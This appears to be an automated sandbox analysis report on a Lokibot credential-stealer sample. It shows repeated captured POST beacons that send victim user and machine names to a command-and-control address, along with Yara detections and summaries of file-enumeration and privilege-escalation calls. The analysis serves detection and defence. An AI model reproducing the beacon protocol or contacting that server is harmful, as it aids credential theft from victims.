Jan 11, 2025 01:44:10.389856100 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.8	51515	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:10.549809933 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:10.558794022 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:11.267416954 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.8	51521	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:11.423024893 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:11.428450108 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:12.275295973 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.8	51531	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:12.440880060 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:12.445729017 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:13.185780048 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.8	51537	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:13.347202063 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:13.353272915 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:14.053210020 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.8	51544	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:14.201705933 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:14.206617117 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:14.935020924 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.8	51550	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:15.083908081 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:15.088828087 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:15.838354111 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.8	51557	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:16.010884047 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:16.015685081 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:16.721132994 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.8	51565	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:16.865232944 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:16.870270014 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:17.604012966 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.8	51571	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:17.771429062 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:17.776453972 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:18.481522083 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.8	51577	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:18.900230885 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:18.905117035 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:19.611534119 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.8	51581	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:19.760009050 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:19.764965057 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:20.465841055 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.8	51582	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:20.620706081 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:20.625880957 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:21.591641903 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Jan 11, 2025 01:44:21.591734886 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.8	51583	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:21.732814074 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:21.737699986 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:22.440511942 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.8	51584	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:22.602380991 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:22.607372999 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:23.341622114 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.8	51585	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:23.511257887 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:23.517155886 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:24.227340937 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.8	51586	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:24.357515097 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:24.362510920 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:25.071022034 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.8	51587	94.156.177.41	80	2884	C:\Users\user\Desktop\EozUxz4ybi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:44:25.202620029 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 01:44:25.207597971 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 01:44:25.895649910 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 00:44:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Target ID:	0
Start time:	19:42:18
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\EozUxz4ybi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EozUxz4ybi.exe"
Imagebase:	0x400000
File size:	98'816 bytes
MD5 hash:	E35101F489A8D1FD3B789335CBDDE45D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000000.1442441088.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, Author: unknown Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000000.00000002.2698954196.000000000056E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	31%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.5%
Total number of Nodes:	1838
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Windows, xrefs: 00403DEA
%s\*, xrefs: 00403D99
Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
